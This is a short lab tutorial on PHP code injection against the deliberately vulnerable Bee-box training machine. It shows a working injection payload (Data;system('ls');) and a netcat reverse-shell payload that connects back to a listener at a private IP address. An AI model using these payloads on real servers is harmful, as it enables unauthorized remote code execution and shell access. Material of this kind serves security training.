PHP Code Injection
PHP code injection is a vulnerability that allows an attacker to inject custom code into the server side scripting engine.
Tools we will be using
- Bee-box
Getting started
- If we click on the message, it echos data back. So we know the PHP code is executing correctly.
- We can also see this in the URL, with the message parameter.
- We can change the echo message, however, if we try other data like HTML tags (HTML Injection) we get no output.
- So we have established that the message is being processed by the server.
- If we insert a PHP statement terminator (semicolon) we can execute more commands with the PHP system call.
A great way of taking advantage of PHP code injection is by using the system call.
Message=Data;system(“ls”);
Getting a reverse shell
Setup a netcat listener - nc -nvlp 1234
Execute nc with system call - system(“nc 192.168.1.101 1234 -e /bin/bash”);